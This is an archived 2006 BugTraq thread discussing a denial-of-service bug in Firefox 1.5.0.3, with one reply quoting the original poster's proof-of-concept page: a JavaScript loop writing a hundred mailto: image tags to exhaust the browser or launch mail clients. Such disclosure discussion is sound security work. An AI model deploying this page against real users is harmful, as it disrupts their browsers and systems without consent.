BugTraq
Firefox 1.5.0.3 - DoS May 06 2006 04:50PM
p4 werterxyz gmail com (3 replies)
Re: Firefox 1.5.0.3 - DoS May 10 2006 11:09PM
Flavio Visentin (THe_ZiPMaN zipman it)
Re: Firefox 1.5.0.3 - DoS May 10 2006 07:59PM
Ronald van den Blink (ronald securityview org)
Re: Firefox 1.5.0.3 - DoS May 10 2006 07:24PM
Chris Horry (zerbey wibble co uk) (1 replies)
Re: Firefox 1.5.0.3 - DoS May 10 2006 08:33PM
RSnake (rsnake shocking com)

This is similar to something I've been toying with for a while:
http://ha.ckers.org/weird/ (the first link "mailto: memory exhaustion)
is around this issue). The only difference is my test page does not
rely on JavaScript which seems to have a more dramatic (read annoying)
effect.

On Wed, 10 May 2006, Chris Horry wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> p4.werterxyz (at) gmail (dot) com [email concealed] wrote:
>> test2:
>> http://werterxyz.altervista.org/test2.html
>> http://geocities.com/werterxyz/test2.html
>
> Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for
> a few seconds and launched Outlook Express, but that's it). Here is the
> code since the original poster didn't see fit to publish it.
>
> <Head>
> <Title>test2 by P4</Title>
> </Head>
>
> <Body>
> <!-- following code added by server. PLEASE REMOVE -->
> <!-- preceding code added by server. PLEASE REMOVE -->
> <SCRIPT Language="Javascript">
> for(i=0; i<100; i++){
> document.write('<Img src="mailto:test (at) test (dot) com [email concealed]?subject=test
> email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona
> "Mostra immagine" (View Image)')
> }
> </SCRIPT>
> </Body>
> <!-- text below generated by server. PLEASE REMOVE
> -
> --></object></layer></div></span></style></noscript></table></script></a
pplet><script
> language="JavaScript"
> src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script
> language="JavaScript"
> src="http://geocities.com/js_source/geov2.js"></script><script
> language="javascript">geovisit();</script><noscript><img
> src="http://visit.geocities.yahoo.com/visit.gif?us1147288798"
> alt="setstats" border="0" width="1" height="1"></noscript>
> <IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61"
> ALT=1 WIDTH=1 HEIGHT=1>
>
>
>>
>> Saluti da P4
>
>
> - --
> Chris Horry KG4TSM "A conservative is a man with two perfectly
> zerbey (at) wibble.co (dot) uk [email concealed] good legs who, however, has never learned how
> http://www.wibble.co.uk to walk forward". -- Franklin D. Roosevelt
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2.2 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF
> 9DAmdMxX5LaboCYnYTtr4GM=
> =z8eV
> -----END PGP SIGNATURE-----
>

-RSnake http://ha.ckers.org/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus